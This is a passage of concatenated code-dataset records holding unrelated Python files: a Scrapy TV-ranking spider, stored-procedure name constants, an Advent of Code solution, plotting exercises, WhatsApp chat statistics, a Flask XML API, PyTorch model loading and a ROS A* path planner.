\n test_length=TEST_LENGTH, \n input_dim=DIM_INPUT, \n hidden_dim=HIDDEN_DIM,\n n_classes=CLASSES,\n batch_size=BATCH_SIZE,\n lr=LEARNING_RATE,\n n_epochs=N_EPOCHS,\n hidden_activation=nn.Tanh(),\n output_activation=nn.Sigmoid(),\n comment=f\"Test length = {TEST_LENGTH}\",\n verbose=False\n )\n","repo_name":"BenKabongo25/m2-dac-deep-learning","sub_path":"TPs/TP04/src/exo2.py","file_name":"exo2.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24283659234","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom lxml import etree\nfrom ..items import OneprojectPachongItem\n\nclass MeijuSpider(scrapy.Spider):\n name = 'meiju'\n allowed_domains = ['meijutt.com']\n start_urls = ['https://www.meijutt.com/new100.html']\n\n def parse(self, response):\n html=response.body.decode('gb2312')\n tree=etree.HTML(html)\n li_list=tree.xpath('//ul[@class=\"top-list fn-clear\"]/li')\n for li in li_list:\n #实例化一个文档\n wendang=OneprojectPachongItem()\n\n rank=li.xpath('.//i/text()')[0]\n title=li.xpath('./h5/a/text()')[0]\n states=li.xpath('./span[1]//text()')[:2]\n state=''.join(states)\n types=li.xpath('./span[2]//text()')[0]\n tv=li.xpath('./span[3]//text()')[0]\n uptimes=li.xpath('.//div[@class=\"lasted-time new100time fn-right\"]//text()')\n uptime=''.join(uptimes)\n\n # 保存到文档,\n wendang['rank']=rank\n wendang['title']=title\n wendang['state']=state\n wendang['types']=types\n wendang['tv']=tv\n wendang['uptime']=uptime\n\n # 暂���挂起,保存上一次操作状态\n yield wendang","repo_name":"peixingtao01/youqu","sub_path":"爬虫/框架/onescrapy/oneproject_pachong/oneproject_pachong/spiders/meiju.py","file_name":"meiju.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43536529797","text":"# Values: @search_name_param, @interval_mins_param, @search_config_param\ncreate_dealify_search_sproc = \"CreateDealifySearch\"\n# Values: @search_id_param, @query_param, @cl_site_param, @area_param, @category_param, @search_titles_param, @require_image_param, @posted_today_param\ncreate_craigslist_query_sproc = \"CreateCraigslistQuery\"\n# Values: @item_name_param, @price_param, @search_id_param, @source_url_param, @source_id_param, @posted_at_param, @is_deleted_param, @has_image_param, @last_updated_param, @repost_of_param, @item_location_param\ncreate_craigslist_item_sproc = \"CreateCraigslistItem\"\ncreate_craigslist_site_sproc = \"CreateCraigslistSite\"\nread_craigslist_subdomain_by_site_id_sproc = \"ReadCraigslistSubdomainBySiteId\"\n# Values: @country_param\nread_craigslist_sites_by_country_sproc = \"ReadCraigslistSitesByCountry\"\n# Values: @state_param\nread_craigslist_sites_by_state_sproc = \"ReadCraigslistSitesByState\"\n\n# Values: @city_param\nread_craigslist_sites_by_city_sproc = \"ReadCraigslistSitesByCity\"\n\n# Values: @search_id_param\nread_dealify_search_by_id_sproc = \"ReadDealifySearchById\"\n\nread_next_overdue_craigslist_query_id_sproc = \"ReadNextOverdueCraigslistQueryId\"\n# Values: @query_id_param\nstart_overdue_craigslist_query_sproc = \"StartOverdueCraigslistQuery\"\n# Values: @query_id_param\nfinish_craigslist_query_sproc = \"FinishCraigslistQuery\"\n# Values: @search_id_param\nuser_disable_dealify_search_sproc = \"UserDisableDealifySearch\"\n# Values: @search_id_param, @limit_param\nread_craigslist_items_by_search_id_sproc = \"ReadCraigslistItemsBySearchId\"\n# Values: @task_name_param, @task_type_param, @task_status_param, @task_config_param\ncreate_dealify_search_task_sproc = \"CreateDealifySearchTask\"\n# Values: @task_id_param\nread_dealify_task_by_id_sproc = \"ReadDealifySearchTaskById\"\n\nstart_next_dealify_search_task_sproc = \"StartNextDealifySearchTask\"\n\nset_overdue_craigslist_queries_sproc = \"SetOverdueCraigslistQueries\"\n\nread_new_dealify_search_ids_sproc = \"ReadNewDealifySearchIds\"\n# Values: @search_id_param\nset_dormant_dealify_search_sproc = \"SetDormantDealifySearch\"\n# Values: @worker_name_param, @task_config_param\ncreate_dealify_worker_sproc = \"CreateDealifyWorker\"\n# Values: @worker_id_param\nread_dealify_worker_by_id_sproc = \"ReadDealifyWorkerById\"\n# Values: @worker_id_param, @worker_status_param\nupdate_dealify_worker_status_sproc = \"UpdateDealifyWorkerStatus\"\n\nread_dealify_task_ids_by_type_sproc = \"ReadDealifyTaskIdsByType\"\n# Values: @worker_id_param, @current_task_param\nupdate_dealify_current_task_by_id_sproc = \"UpdateDealifyCurrentTaskById\"\n# Values: @item_id_param\nset_deleted_craigslist_item_sproc = \"SetDeletedCraigslistItem\"\n# Values: @interval_days_param, @limit_param\nread_old_craigslist_items_sproc = \"ReadOldActiveCraigslistItems\"\n\nupdate_craigslist_item_status_sproc = \"UpdateCraigslistItemStatus\"\n\n# Values: @status_param, @limit_param\nread_craigslist_queries_by_status_sproc = \"ReadCraigslistQueriesByStatus\"\n# Values: @query_id_param, @new_status_param\nupdate_craigslist_query_status_sproc = \"UpdateCraigslistQueryStatus\"\n# Values: @site_id_param\nread_craigslist_site_by_id_sproc = \"ReadCraigslistSiteById\"\n# Values: @search_name_param\nread_dealify_search_by_name_sproc = \"ReadDealifySearchByName\"\n# Values: @search_status_param, @limit_param\nread_dealify_searches_by_status_sproc = \"ReadDealifySearchesByStatus\"\n# Values: @search_id_param, @new_status_param\nupdate_dealify_search_status_sproc = \"UpdateDealifySearchStatus\"\n# Values: @search_id_param, @new_config_param\nupdate_dealify_search_config_sproc = \"UpdateDealifySearchConfig\"\n# Values: @status_param, @limit_param\nread_old_craigslist_queries_sproc = \"ReadOldestCraigslistQueries\"\n# Values: @key_name_param, @config_value_param, @notes_param\ncreate_config_key_sproc = \"CreateConfigKey\"\n# Values: @key_name_param\nread_config_key_by_name_sproc = \"ReadConfigKeyByName\"\n","repo_name":"Kroonjay/Dealify","sub_path":"core/database/sprocs.py","file_name":"sprocs.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5541449947","text":"import os\n\n(file, _) = os.path.splitext(os.path.basename(__file__))\n# f = open(f\"{file}sample.txt\", \"r\")\nf = open(f\"{file}.txt\", \"r\")\nlines = []\nfor rawline in f:\n line = str.strip(rawline)\n lines.append(line)\n\n\n\ninputs = []\nmaxval = 0\nfor line in lines:\n parts = line.split(\" -> \")\n parta = parts[0].split(\",\")\n partb = parts[1].split(\",\")\n xa = int(parta[0])\n ya = int(parta[1])\n xb = int(partb[0])\n yb = int(partb[1])\n inputs.append(((xa,ya), (xb, yb)))\n maxval = max(maxval, xa, ya, xb, yb)\n\nmaxval += 1\nboard = []\nfor y in range(maxval):\n board.append([])\n for x in range(maxval):\n board[y].append(0)\n\ncount = 0\n\nfor input in inputs:\n # if input[0][0] != input[1][0] and input[0][1] != input[1][1]:\n # continue\n print(input)\n ystep = 1\n xstep = 1\n if input[0][0] == input[1][0]:\n x = input[0][0]\n yfrom = input[0][1]\n yto = input[1][1]\n ystep = 1 if yfrom < yto else -1\n yto += ystep\n print(f'[{x}][{yfrom},{yto},{ystep}]')\n for y in range(yfrom,yto,ystep):\n board[y][x] += 1\n if board[y][x] == 2:\n count += 1;\n\n\n elif input[0][1] == input[1][1]:\n y = input[0][1]\n xfrom = input[0][0]\n xto = input[1][0]\n xstep = 1 if xfrom < xto else -1\n xto += xstep\n print(f'[{xfrom},{xto},{xstep}][{y}')\n for x in range(xfrom,xto,xstep):\n board[y][x] += 1\n if board[y][x] == 2:\n count += 1;\n else:\n xfrom = input[0][0]\n xto = input[1][0]\n xstep = 1 if xfrom < xto else -1\n xto += xstep\n\n yfrom = input[0][1]\n yto = input[1][1]\n ystep = 1 if yfrom < yto else -1\n yto += ystep\n y = yfrom\n\n print(f'[{xfrom, xto, xstep}][{yfrom},{yto},{ystep}]')\n\n for x in range(xfrom, xto, xstep):\n board[y][x] += 1\n if board[y][x] == 2:\n count += 1;\n y += ystep\n\nfor b in board:\n print(b)\nprint(count)","repo_name":"blanchg/aoc2021","sub_path":"5a.py","file_name":"5a.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36093090101","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 10 11:43:00 2020\r\n绘图1\r\n@author: kanwa\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# 画一条直线,y轴的数值指定,x轴的数值matplotlib指定,从0开始[0,1,2,3]\r\nplt.plot([1, 2, 3, 4])\r\nplt.ylabel('some numbers')\r\nplt.show()\r\n\r\nplt.plot([1, 2, 3, 4],[1, 2, 3, 4])\r\nplt.ylabel('some numbers')\r\nplt.xlabel('some nmbers')\r\nplt.show()\r\n# axis()[x坐标最小值,x坐标最大值,y坐标最小值,y坐标最大值]\r\nplt.plot([1, 2, 3, 4], [1, 4, 9, 16], 'ro')\r\nplt.axis([0, 6, 0, 20])\r\nplt.show()\r\n\r\n# sin函数\r\nx = np.arange(0, 8, 0.1);\r\ny = np.sin(x)\r\nplt.plot(x, y)\r\n\r\n\r\n# 举例\r\nexcelDataset = pd.read_excel(r'.\\data\\ScoresofStudents1.xlsx',sheet_name = None)\r\nscores2018_1 = excelDataset[list(excelDataset.keys())[1]]\r\nscores2018_2 = excelDataset[list(excelDataset.keys())[2]]\r\nplt.plot(scores2018_1['Scores'], 'ro')\r\nplt.plot(scores2018_2['studentsOfScores'], 'g.')\r\nplt.plot(scores2018_1['Scores'], 'r--')\r\n\r\n# 课程平均成绩bar\r\nsubjectsScores = scores2018_1.groupby('CourseID')['Scores'].mean()\r\nlabels = list(subjectsScores.index)\r\nplt.bar(labels,subjectsScores.values)\r\n","repo_name":"andrewkan1/pythonbasement","sub_path":"102 Pandas-DataFrame-40.py","file_name":"102 Pandas-DataFrame-40.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15148725831","text":"import matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\nfrom neattext import TextExtractor\r\nfrom collections import Counter\r\nimport pandas as pd\r\nimport emoji\r\nimport plotly.express as px\r\n\r\n\r\ndef fetch_stats(user, df):\r\n if user != 'overall':\r\n df = df[df['user'] == user]\r\n num_messages = df.shape[0]\r\n\r\n\r\n media_msg = df[df['messages'].str.contains('image omitted|Image Omitted') | df['messages'].str.contains(\r\n 'media omitted|Media omitted')].shape[0]\r\n words = []\r\n for message in df['messages']:\r\n words.extend(message.split())\r\n\r\n\r\n emojis = []\r\n for message in df['messages']:\r\n sent = TextExtractor(message)\r\n\r\n emojis.append(sent.extract_emojis())\r\n\r\n df['emojis'] = emojis\r\n emojis_sent = sum(df['emojis'].str.len())\r\n\r\n return num_messages, len(words), media_msg, emojis_sent\r\n\r\n\r\ndef most_busy_users(df):\r\n all_users = len(df['user'].unique())\r\n top_msg = df.groupby('user')['messages'].count().sort_values(ascending=False).head(10).reset_index()\r\n top_user = top_msg['user'][0]\r\n msg_top_sent = top_msg['messages'][0]\r\n average_msgs = len(df['messages'])/len(df['user'].unique())\r\n return top_user, all_users, msg_top_sent, top_msg, average_msgs\r\n\r\ndef emoji_helper(user,df):\r\n if user!= 'overall':\r\n df = df[df['user'] == user]\r\n emojis = []\r\n for message in df['messages']:\r\n emojis.extend([c for c in message if c in emoji.UNICODE_EMOJI['en']])\r\n emoji_df = pd.DataFrame(Counter(emojis).most_common(20))\r\n emoji_df.columns = ['emoji', 'count']\r\n most_common_emoji = emoji_df['emoji'][0]\r\n len_most_common = emoji_df['count'][0]\r\n unique_emojis = len(emoji_df['emoji'].unique())\r\n\r\n em = emoji_df.head(5)\r\n return most_common_emoji,unique_emojis,em,len_most_common\r\n\r\ndef monthly_weekly_time(user,df):\r\n if user != 'overall':\r\n df = df[df['user'] == user]\r\n weekly= df.groupby('weekname')['messages'].size().reset_index().sort_values(by ='messages',ascending=False).reset_index()\r\n hourly = df.groupby('hour')['messages'].count().reset_index().sort_values(by ='messages',ascending=False).reset_index()\r\n hours_p = []\r\n for h in hourly['hour']:\r\n if h > 12:\r\n hours_p.append(str(h - 12) + \" \" + \"PM\")\r\n else:\r\n hours_p.append(str(h) + \" \" + \"AM\")\r\n hourly['hours_p'] = hours_p\r\n hourly[['hours_p', 'messages']]\r\n return hourly,weekly\r\n\r\n\r\ndef timeline_chart(user, df):\r\n if user != 'overall':\r\n df = df[df['user'] == user]\r\n timeline = df.groupby(['year', 'month']).size().reset_index(name='count')\r\n year_month = []\r\n for i in range(timeline.shape[0]):\r\n year_month.append(timeline['month'][i] + \"-\" + str(timeline['year'][i]))\r\n timeline['time'] = year_month\r\n return timeline\r\n\r\ndef create_wordcloud(user, df):\r\n if user != 'overall':\r\n df = df[df['user'] == user]\r\n wc = WordCloud(stopwords=STOPWORDS, width=500, height=500, min_font_size=10, background_color='white')\r\n df_wc = wc.generate(df['messages'].str.cat(sep=' '))\r\n\r\n\r\n\r\n return df_wc\r\n\r\n\r\n\r\n","repo_name":"rohan-kusuma/WhatsappAnalyzer","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15468295076","text":"from flask import Flask, request, jsonify, Response\nimport xml.etree.ElementTree as ET\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n# Datos donde almacenar los mensajes procesados en formato XML\nmessages_data = []\nmessages_data2 = []\n\n@app.route('/grabarMensaje', methods=['POST'])\ndef grabar_mensaje():\n if 'file' not in request.files:\n return jsonify({\n \"message\": \"No se ha enviado un archivo, intente de nuevo\"\n })\n\n file = request.files['file']\n file_contents = file.read().decode('utf-8')\n\n # Procesar el archivo XML y extraer la información requerida\n root = ET.fromstring(file_contents)\n fecha = root.find('TIEMPO/FECHA').text.strip()\n msj_recibidos = root.find('TIEMPO/MSJ_RECIBIDOS').text.strip()\n usr_mencionados = root.find('TIEMPO/USR_MENCIONADOS').text.strip()\n hash_incluidos = root.find('TIEMPO/HASH_INCLUIDOS').text.strip()\n\n # Almacenar la información en un diccionario\n message_info = {\n \"FECHA\": fecha,\n \"MSJ_RECIBIDOS\": msj_recibidos,\n \"USR_MENCIONADOS\": usr_mencionados,\n \"HASH_INCLUIDOS\": hash_incluidos\n }\n\n # Agregar la información al registro de mensajes\n messages_data.append(message_info)\n\n return jsonify({\n \"message\": \"El mensaje fue grabado con éxito\"\n })\n\n@app.route('/grabarConfiguracion', methods=['POST'])\ndef grabar_configuracion():\n if 'file' not in request.files:\n return jsonify({\n \"message\": \"No se ha enviado un archivo, intente de nuevo\"\n })\n file = request.files['file']\n file_contents = file.read().decode('utf-8')\n\n # Procesar el archivo XML y almacenar los datos en un diccionario\n config_data = {}\n root = ET.fromstring(file_contents)\n\n # Procesar las secciones del archivo XML\n for section in root:\n section_name = section.tag\n config_data[section_name] = {}\n\n for word_element in section:\n word = word_element.text.strip()\n count = len(list(word_element))\n config_data[section_name][word] = count\n\n # Agregar la información al registro de configuración\n messages_data2.append(config_data)\n\n return jsonify({\n \"message\": \"La configuración del servidor fue grabada con éxito\"\n })\n\n\n\n@app.route('/limpiarDatos', methods=['POST'])\ndef limpiar_datos():\n messages_data.clear()\n messages_data2.clear()\n return jsonify({\"message\": \"Datos limpiados exitosamente\"})\n\n\n@app.route('/devolverHashtags', methods=['GET'])\ndef devolver_hashtags():\n # Crear un elemento XML con la información almacenada en messages_data\n xml_response = ET.Element(\"MENSAJES_RECIBIDOS\")\n for message_info in messages_data:\n tiempo = ET.SubElement(xml_response, \"TIEMPO\")\n fecha = ET.SubElement(tiempo, \"FECHA\")\n fecha.text = message_info[\"FECHA\"]\n msj_recibidos = ET.SubElement(tiempo, \"MSJ_RECIBIDOS\")\n msj_recibidos.text = message_info[\"MSJ_RECIBIDOS\"]\n usr_mencionados = ET.SubElement(tiempo, \"USR_MENCIONADOS\")\n usr_mencionados.text = message_info[\"USR_MENCIONADOS\"]\n hash_incluidos = ET.SubElement(tiempo, \"HASH_INCLUIDOS\")\n hash_incluidos.text = message_info[\"HASH_INCLUIDOS\"]\n\n # Generar una respuesta XML\n response = ET.tostring(xml_response, encoding=\"utf-8\")\n return Response(response, content_type='application/xml')\n\n\n@app.route('/devolverMenciones', methods=['GET'])\ndef devolver_menciones():\n if not messages_data2:\n return jsonify({\"menciones\": \"No hay datos de configuración almacenados\"})\n\n word_counts = {}\n xml_response = ET.Element(\"CONFIG_RECIBIDA\")\n\n for section_name, words in messages_data2[-1].items():\n section = ET.Element(section_name)\n section_words = set() # Usamos un conjunto para evitar duplicados en la salida\n for word in words:\n if word not in section_words:\n section_words.add(word)\n word_counts[word] = word_counts.get(word, 0) + 1\n word_element = ET.Element(\"palabra\")\n word_element.text = word\n section.append(word_element)\n xml_response.append(section)\n\n for word, count in word_counts.items():\n section = ET.Element(\"conteo_\" + word)\n palabra_element = ET.Element(\"palabra\")\n palabra_element.text = word\n section.append(palabra_element)\n conteo_element = ET.Element(\"conteo\")\n conteo_element.text = str(count)\n section.append(conteo_element)\n xml_response.append(section)\n\n response = ET.tostring(xml_response, encoding=\"utf-8\")\n return Response(response, content_type='application/xml')\n\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"frandergomez/IPC2_Proyecto3_201901371","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18818286709","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# Author: speedinghzl\n# URL: https://github.com/speedinghzl/pytorch-segmentation-toolbox\n\nimport time\nimport logging\n\nimport torch\nimport torch.nn as nn\n\nfrom .logger import get_logger\n\n\n\nlogger = get_logger()\n\n\"\"\"def init_layer(key):\n #初始化层,(未进行预训练并微调)\n if key.split('.')[-1] == 'weight':\n if 'conv' in key:\n if self.state_dict()[key].ndimension() >= 2:\n nn.init.kaiming_normal_(self.state_dict()[key], mode='fan_out', nonlinearity='relu')\n elif 'bn' in key:\n self.state_dict()[key][...] = 1\n elif key.split('.')[-1] == 'bias':\n self.state_dict()[key][...] = 0.001\"\"\"\n\ndef weight_init(self):\n if isinstance(self,nn.Conv3d):\n #nn.init.kaiming_normal_(self.weight.data, mode='fan_out', nonlinearity='relu')\n nn.init.xavier_normal_(self.weight.data,gain=0.01)\n #nn.init.normal_(self.weight.data,mean=0,std=0.01)\n nn.init.constant_(self.bias.data,0)\n elif isinstance(self,nn.BatchNorm2d):\n self.weight.data.fill_(1)\n self.bias.data.zero_()\n\ndef load_model(model, model_file, is_restore=False):\n t_start = time.time()\n if isinstance(model_file, str):\n device = torch.device('cpu')\n state_dict = torch.load(model_file, map_location=device)\n if 'state_dict' in state_dict.keys():\n state_dict = state_dict['state_dict']\n else:\n state_dict = model_file\n t_ioend = time.time()\n\n if not is_restore:\n # extend the input channels of FGPLG from 3 to 7\n v2 = model.backbone.resnet.conv1.weight\n if v2.size(1) > 3:\n v = state_dict['backbone.resnet.conv1.weight']\n v = torch.cat((v,v2[:,3:,:,:]), dim=1)\n state_dict['backbone.resnet.conv1.weight'] = v\n\n model.load_state_dict(state_dict, strict=False)\n ckpt_keys = set(state_dict.keys())\n own_keys = set(model.state_dict().keys())\n missing_keys = own_keys - ckpt_keys\n unexpected_keys = ckpt_keys - own_keys\n\n\n for k in missing_keys:\n weight_init(k)\n\n\n if len(missing_keys) > 0:\n logger.warning('Missing key(s) in state_dict: {}'.format(\n ', '.join('{}'.format(k) for k in missing_keys)))\n\n if len(unexpected_keys) > 0:\n logger.warning('Unexpected key(s) in state_dict: {}'.format(\n ', '.join('{}'.format(k) for k in unexpected_keys)))\n\n del state_dict\n t_end = time.time()\n logger.info(\n \"Load model, Time usage:\\n\\tIO: {}, initialize parameters: {}\".format(\n t_ioend - t_start, t_end - t_ioend))\n\n return model","repo_name":"ELOESZHANG/FANet","sub_path":"network/libs/utils/pyt_utils.py","file_name":"pyt_utils.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37361473457","text":"import json\n\nfrom django.views.generic import TemplateView\n\nfrom .models import Country\n\n# Countries Data:\n# https://github.com/SmileyChris/django-countries/blob/master/django_countries/data.py#L45\n\n\nclass HomeView(TemplateView):\n template_name = \"base.html\"\n\n def get_context_data(self, **kwargs):\n context = super(HomeView, self).get_context_data(**kwargs)\n countries = Country.objects.filter(population__isnull=False)\n\n podcasts_per_captia_data = {\n c.code: c.podcasts_per_captia() for c in countries}\n population_data = {c.code: c.intword_population for c in countries}\n podcasts_data = {c.code: c.podcasts_count for c in countries}\n\n context[\"podcasts_per_captia_data\"] = json.dumps(\n podcasts_per_captia_data)\n context[\"podcasts_data\"] = json.dumps(podcasts_data)\n context[\"population_data\"] = json.dumps(population_data)\n context[\"countries\"] = countries\n return context\n","repo_name":"team-i18n/hackaway","sub_path":"teami18n/teami18n/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38292530813","text":"#!/usr/bin/env python3\nimport heapq\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport rospy\nfrom math import sqrt\nfrom geometry_msgs.msg import Point\nfrom nav_msgs.msg import OccupancyGrid\nfrom planner.srv import astar, astarResponse\n\nshow_animation = True\nclass Astar:\n def __init__(self, resolution, world_min_x, world_min_y, obstacle_map, x_width, y_width):\n # world_min_x, world_min_y are the minimum x and y co-ordinates of the world.\n # x_width and y_width are the dimensions of the map.\n self.resolution = resolution\n self.world_min_x, self.world_min_y = world_min_x, world_min_y\n self.obstacle_map = obstacle_map\n self.x_width, self.y_width = x_width, y_width\n\n class Node:\n def __init__(self, x, y, cost, parent_node, processed):\n self.x = x # index of grid\n self.y = y # index of grid\n self.cost = cost\n self.parent = parent_node\n self.processed = processed\n \n @classmethod\n def from_tuple(cls, t):\n x, y = t\n return cls(x, y, float(\"inf\"), None, False)\n\n def __str__(self):\n return (\n str(self.x)\n + \",\"\n + str(self.y)\n + \",\"\n + str(self.cost)\n + \",\"\n + str(self.parent)\n )\n\n def calc_grid_position(self, index, min_position):\n \"\"\"\n Given an index, it calculates the position of the grid in the world coordinate frame\n\n index: this maybe the x or y coordinate\n min_position: pass the min_x or min_y accordingly\n return: actual position of the grid in the world frame\n \"\"\"\n pos = index * self.resolution + min_position\n return pos\n\n def calc_xy_index(self, position, min_pos):\n \"\"\"\n calculates the index of the grid cell where the given position lies\n position: position in the world frame (again maybe x or y coordinate)\n min_pos: pass the min_x or min_y accordingly\n \"\"\"\n return round((position - min_pos) / self.resolution)\n\n def return_cost(self, t1, t2):\n x1, y1 = t1\n x2, y2 = t2\n\n # Taking max since the grids with uncertainity are -1, so avoiding negative weights\n t = max(self.obstacle_map[int(y1)][int(x1)], 0) + max(self.obstacle_map[int(y2)][int(x2)], 0)\n if t >= 80:\n t = float(\"inf\")\n return t\n else:\n return self.distance(t1, t2)\n\n def distance(self, current_node, node2):\n \"\"\"\n This returns the euclidian distance between two nodes.\n \"\"\"\n x, y = current_node\n x1, y1 = node2\n\n # euclidian distance\n return sqrt((x-x1)**2 + (y-y1)**2)\n\n def calc_heuristic(self, current_node, node2):\n \"\"\"\n This is the heuristic function for A*.\n Diagonal Distance Heuristic is used.\n \"\"\"\n x, y = current_node\n x1, y1 = node2\n\n dx = abs(x - x1)\n dy = abs(y - y1)\n\n h = (dx + dy) + (sqrt(2) - 2) * min(dx, dy)\n return h\n\n def return_neighbours(self, current_node):\n \"\"\"\n Returns : List containing the neighbours of the current node (as tuples).\n \"\"\"\n l = []\n x, y = current_node\n x_minus = x - 1\n y_minus = y - 1\n x_plus = x + 1\n y_plus = y + 1\n\n max_x = self.x_width\n min_x = 0\n min_y = 0\n max_y = self.y_width\n\n if x_plus < max_x:\n l.append((x_plus, y))\n\n if y_plus < max_y:\n l.append((x_plus, y_plus))\n\n if y_minus >= min_y:\n l.append((x_plus, y_minus))\n\n if x_minus >= min_x:\n l.append((x_minus, y))\n\n if y_plus < max_y:\n l.append((x_minus, y_plus))\n\n if y_minus >= min_y:\n l.append((x_minus, y_minus))\n\n if y_plus < max_y:\n l.append((x, y_plus))\n\n if y_minus >= min_y:\n l.append((x, y_minus))\n\n return l\n\n def plan(self, sx, sy, gx, gy):\n pq = [] # this is the list which we are going to use as a priority queue\n rx = []\n ry = []\n reached = {}\n # converting the positions into indices of the grid\n sx, sy = self.calc_xy_index(sx, self.world_min_x), self.calc_xy_index(sy, self.world_min_y)\n gx, gy = self.calc_xy_index(gx, self.world_min_x), self.calc_xy_index(gy, self.world_min_y)\n start = (sx, sy)\n goal = (gx, gy)\n\n heapq.heappush(\n pq, (0.0 + self.distance(start, goal), start)\n ) # similar to pq.push() in c++\n\n start_node = self.Node(sx, sy, 0.0, None, False)\n reached[start] = start_node\n iterations = 0 # to keep track of total number of iterations.\n\n while len(pq) > 0:\n iterations += 1\n d, t = heapq.heappop(pq)\n if (\n reached[t].processed == True\n ): # if node is processed no need to iterate this node\n continue\n\n reached[t].processed = True\n # if show_animation: # pragma: no cover\n # plt.plot(\n # self.calc_grid_position(reached[t].x, self.world_min_x),\n # self.calc_grid_position(reached[t].y, self.world_min_y),\n # \"xc\",\n # )\n # plt.pause(0.001)\n\n if (\n t == goal\n ): # if goal is reached, backtrack all nodes from goal upto parent\n print(\"goal reached!\")\n node = reached[goal]\n while not (node == None):\n rx.append(self.calc_grid_position(node.x, self.world_min_x))\n ry.append(self.calc_grid_position(node.y, self.world_min_y))\n node = node.parent\n rx.reverse()\n ry.reverse()\n return True, rx, ry\n\n l = self.return_neighbours(t)\n for tup in l:\n if (\n reached.get(tup) == None\n ): # object does not exist, so creating an object here\n n = self.Node.from_tuple(tup)\n n.cost = reached[t].cost + self.return_cost(t, tup)\n n.parent = reached[t]\n reached[tup] = n\n heapq.heappush(pq, (n.cost + self.calc_heuristic(tup, goal), tup))\n \n elif (\n reached[t].cost + self.return_cost(t, tup)< reached[tup].cost\n ): # In this case object already exists, so just update the values\n n = reached[tup]\n n.cost = reached[t].cost + self.return_cost(t, tup)\n n.parent = reached[t]\n reached[tup] = n\n heapq.heappush(pq, (n.cost + self.calc_heuristic(tup, goal), tup))\n\n if iterations > 5000: # Just to ensure we don't go in an infinite loop\n print(\"goal not reached\")\n return False, [], []\n\n\n\n\ndef main_planner(request):\n global show_animation\n print(\"in main planner\")\n # initialize variables\n obstacle_map = OccupancyGrid()\n start_point = Point()\n goal_point = Point()\n\n # extract data from request\n obstacle_map = request.obstacle_map\n start_point = request.start_pos\n goal_point = request.goal_pos\n\n # extract map parameters\n map_width = obstacle_map.info.width\n map_height = obstacle_map.info.height\n map_data = obstacle_map.data\n map_resolution = obstacle_map.info.resolution\n # x and y coordinates of the cell (0,0) of map in the real world\n map_origin_x = obstacle_map.info.origin.position.x\n map_origin_y = obstacle_map.info.origin.position.y\n\n # set start and goal position\n sx = start_point.x\n sy = start_point.y\n gx = goal_point.x\n gy = goal_point.y\n\n ox, oy = [], []\n print(1)\n map_data = np.array(map_data, dtype=np.int32)\n\n map_data = map_data.reshape((map_height, map_width))\n temp = np.where(map_data==100)\n tempx = temp[0]\n tempy = temp[1]\n # l = [\n # (i, j)\n # for i in range(map_height)\n # for j in range(map_width)\n # if map_data[i, j] == 100\n # ]\n\n # for i in range(map_width):\n # for j in range(map_height):\n # if map_data[j][i] >= 50:\n # oy.append((float(i) * map_resolution) + map_origin_x)#ox\n # ox.append((float(j) * map_resolution) + map_origin_y)#oy\n # print(\"still forring\"+str(i))\n # if show_animation:\n # plt.plot(oy, ox, \".k\")#ox,oy\n # plt.plot(sx, sy, \"og\")# sx,sy\n # plt.plot(gx, gy, \"xb\")# gx,gy\n # plt.grid(True)\n # plt.axis(\"equal\")\n # plt.pause(0.001)\n '''\n The nxt part of the code is meant for easier path tracking. Each obstacle is enhanced to the \n size of the bot_radius. This is done to ensure that if the bot travels on the path returned by the\n planner it does not collide with the obstacles.\n '''\n\n # radius of the bot in world frame.\n bot_radius = 0.225\n # radius of the bot in map frame. \n map_bot_radius = int(round(bot_radius / map_resolution))\n #print(l)\n\n # #enhance obstacles \n # #gox = 1.7\n # #goy = 0\n # #sx = -2\n # #sy = 0\n # #m = ((gy-sy)/(gx-sx))\n # #c = gy-m*gx\n # #c1 = c - (map_bot_radius)*((sqrt(1+m*m)))\n # #c2 = c + (map_bot_radius)*((sqrt(1+m*m)))\n # #print('start')\n # #print(l)\n\n print(2)\n for cx, cy in list(zip(tempx, tempy)): \n #c0 = cy - m*cx\n #if ((cx>-2) and (cx<1.7) and (y<0.75) and (cy>-0.75)):\n # print('hi')\n map_data = cv2.circle(map_data, (cy, cx), map_bot_radius, 100, -1) \n print('end')\n print(map_data)\n '''\n This part makes space around the goal empty for the planner. It is possible that the goal is very near\n to an obstacle it lies within bot_radius [m] of the obstacle. In this case A* wil fail to return a path \n although one exists. Hence, the obstacles within bot_radius [m] of the goal are removed.\n '''\n print(3)\n map_data = cv2.circle(\n map_data, \n (int(round((gy - map_origin_y) / map_resolution)), # map co-ordinate of goal_x\n int(round((gy - map_origin_y) / map_resolution))), # map co-ordinate of goal_y\n map_bot_radius,\n 0, \n -1\n )\n print(\"tryig a* 